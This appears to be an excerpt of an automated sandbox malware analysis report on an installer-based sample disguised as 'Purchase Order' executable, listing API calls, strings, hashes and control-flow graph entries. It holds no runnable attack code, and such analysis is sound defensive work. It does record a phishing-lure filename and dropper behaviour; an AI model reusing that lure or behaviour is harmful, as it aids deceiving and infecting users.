                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                            • MulDiv.KERNEL32(000B0B69,?,000B0D6D), ref: 00402E3C
                                            • wsprintfW.USER32 ref: 00402E4C
                                            • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402E46
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            APIs
                                              • Part of subcall function 73CF121B: GlobalAlloc.KERNELBASE(?,?,73CF123B,?,73CF12DF,00000019,73CF11BE,-000000A0), ref: 73CF1225
                                            • GlobalFree.KERNEL32(?), ref: 73CF265B
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF2690
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            APIs
                                              • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                              • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                            • GlobalAlloc.KERNEL32(?,?), ref: 00402901
                                            • CloseHandle.KERNEL32(?), ref: 00402981
                                              • Part of subcall function 00403347: SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,?,0000000A), ref: 00403355
                                            • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040291D
                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                              • Part of subcall function 00403116: GetTickCount.KERNEL32 ref: 00403180
                                              • Part of subcall function 00403116: GetTickCount.KERNEL32 ref: 00403227
                                              • Part of subcall function 00403116: MulDiv.KERNEL32(7FFFFFFF,?,00000000), ref: 00403250
                                              • Part of subcall function 00403116: wsprintfW.USER32 ref: 00403263
                                            • DeleteFileW.KERNEL32(?), ref: 00402995
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                            • String ID:
                                            • API String ID: 2082585436-0
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp\System.dll,?,?,?,00000021), ref: 004025E8
                                            • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp\System.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp\System.dll,?,?,?,00000021), ref: 004025F3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: ByteCharMultiWidelstrlen
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp$C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp\System.dll
                                            • API String ID: 3109718747-429556033
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: FreeGlobal
                                            • String ID:
                                            • API String ID: 2979337801-0
                                            APIs
                                            • GetDC.USER32(?), ref: 00401DBC
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                            • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID:
                                            • API String ID: 3808545654-0
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73CF21F0,?,00000808), ref: 73CF1639
                                            • GlobalAlloc.KERNEL32(?,00000000,?,00000000,73CF21F0,?,00000808), ref: 73CF1640
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73CF21F0,?,00000808), ref: 73CF1654
                                            • GetProcAddress.KERNEL32(73CF21F0,00000000), ref: 73CF165B
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF1664
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                            • String ID:
                                            • API String ID: 1148316912-0
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401D63
                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            APIs
                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            APIs
                                            • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                            • wsprintfW.USER32 ref: 00404B88
                                            • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,0040337C,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 00405B95
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,0040337C,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 00405B9F
                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,?,0000000A), ref: 00405BB1
                                            Strings
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B8F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                            • API String ID: 2659869361-2382934351
                                            APIs
                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Close$Enum
                                            • String ID:
                                            • API String ID: 464197530-0
                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,?,0000000A), ref: 00402E8C
                                            • GetTickCount.KERNEL32 ref: 00402EAA
                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                            • ShowWindow.USER32(00000000,00000005,?,00000006,?,0000000A), ref: 00402ED5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            APIs
                                            • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B3420,004038ED,00403703,00000006,?,00000006,?,0000000A), ref: 0040392F
                                            • GlobalFree.KERNEL32(?), ref: 00403936
                                            Strings
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403927
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                            • API String ID: 1100898210-2382934351
                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405BE1
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405BF1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-3976562730
                                            • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                            • Instruction ID: aeb767edbde6605fb3f6e877d1e8e55744b908c0e0c9ef55a7edb7ad10a4fca3
                                            • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                            • Instruction Fuzzy Hash: D9D05EB2414920DAC3126B04DC40D9F73ACEF11300B4A446AE440A61A1D7786C8186AD
                                            APIs
                                            • GlobalAlloc.KERNEL32(?,?), ref: 73CF116A
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF11C7
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF11D9
                                            • GlobalFree.KERNEL32(?), ref: 73CF1203
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            • Associated: 00000005.00000002.1958280098.0000000073CF0000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1958325836.0000000073CF3000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1958346292.0000000073CF5000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: 369094fd6eac7c9b2c4ab54623578fba49438e06a3554d0578df81dd65481c8a
                                            • Instruction ID: 1391a45ee23b6083de4b5b881d00dbe0b7a0ef33891477dd5c6ec7e5a3690bff
                                            • Opcode Fuzzy Hash: 369094fd6eac7c9b2c4ab54623578fba49438e06a3554d0578df81dd65481c8a
                                            • Instruction Fuzzy Hash: C331C4B3500213AFE740FFA6D944F257BF8EB44310715811AE84ADB254E736DD40C721
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                            • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                            • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                            • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                            • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98

                                            Execution Graph

                                            Execution Coverage:0%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:100%
                                            Total number of Nodes:1
                                            Total number of Limit Nodes:0
                                            execution_graph 70195 34862b60 LdrInitializeThunk

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3 348635c0-348635cc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ba13430adbb1f53f3fc4c3446293a5768b406a80410730b3bf79942aca115e64
                                            • Instruction ID: e1599bb6bde06204609848d18242c17ac520c6a2ec0a0e565a2abf3a601ee9c2
                                            • Opcode Fuzzy Hash: ba13430adbb1f53f3fc4c3446293a5768b406a80410730b3bf79942aca115e64
                                            • Instruction Fuzzy Hash: E090023160550406D1007158452470664054FD0205F65C922A0425528D8795CA9965A3

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1 34862c70-34862c7c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: be67bf25d5e817120f2a5aa3a6757ea1ffb6e4bff83522a054bcfbdfe0862697
                                            • Instruction ID: 04c37c4dedddf0a01ca6451e95219e44315dd8644025eefd40c2954eb5cfb948
                                            • Opcode Fuzzy Hash: be67bf25d5e817120f2a5aa3a6757ea1ffb6e4bff83522a054bcfbdfe0862697
                                            • Instruction Fuzzy Hash: E590023120148806D1107158841474A54054FD0305F59C922A4425618D8695C9D97122

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2 34862df0-34862dfc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3f51eaf8add01181130a877e9237f13b63b5ad324ef66f9ed1726917027a5ab4
                                            • Instruction ID: 9bc8dc5e1c340745437dc5ffe10e08789f0f08e685b49db7851bf3adb830b09f
                                            • Opcode Fuzzy Hash: 3f51eaf8add01181130a877e9237f13b63b5ad324ef66f9ed1726917027a5ab4
                                            • Instruction Fuzzy Hash: F790023120140417D1117158451470754094FD0245F95C923A0425518D9656CA9AA122

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 34862b60-34862b6c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 83075888efd77a7416ceae62fd17b1bdd3cfee8e0b6ba647bc69d8ba5dc939c2
                                            • Instruction ID: 2dd5461ecd4cd12037aeb1e5f5fb29296ea738b5192a086cf17788097d9f4f51
                                            • Opcode Fuzzy Hash: 83075888efd77a7416ceae62fd17b1bdd3cfee8e0b6ba647bc69d8ba5dc939c2
                                            • Instruction Fuzzy Hash: 7690026120240007410571584424616940A4FE0205B55C532E1015550DC525C9D96126

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 97 (node and edge listing of the rendered graph omitted)
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                            • API String ID: 2994545307-2897834094
                                            • Opcode ID: f4e5d20f653519e817da22f36cef609d67eba8c86d04ba748de68643e10b1a25
                                            • Instruction ID: 42681a51eb48117a2fba202d7593595d75d031c992ee49cd9bed67eb03dcfc05
                                            • Opcode Fuzzy Hash: f4e5d20f653519e817da22f36cef609d67eba8c86d04ba748de68643e10b1a25
                                            • Instruction Fuzzy Hash: 5961C076917645EFF2029B58D890E1073E8EB0EA70B05439BEA01DF713DA348C86DE45

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 555 (node and edge listing of the rendered graph omitted)
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $ $0
                                            • API String ID: 3446177414-3352262554
                                            • Opcode ID: 213cd1e9a190f54fe6a29ee78c9afd909fd95fefe48aceb894f97123d027f813
                                            • Instruction ID: 32ec81bdf032b409a743e72d8208c36d67d9a2fd95b5b3257e535cb2ee9b6ade
                                            • Opcode Fuzzy Hash: 213cd1e9a190f54fe6a29ee78c9afd909fd95fefe48aceb894f97123d027f813
                                            • Instruction Fuzzy Hash: CC3203B16083818FE350CF68C984B5BFBE5BB88354F004A6EF59987290D7B5D94ACF52

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1298 (node and edge listing of the rendered graph omitted)
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 3446177414-1700792311
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                            • API String ID: 0-3591852110
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                            • API String ID: 0-3532704233
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                            • API String ID: 3446177414-3570731704
                                            APIs
                                            • RtlDebugPrintTimes.NTDLL ref: 3484D959
                                              • Part of subcall function 34824859: RtlDebugPrintTimes.NTDLL ref: 348248F7
                                            Strings
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
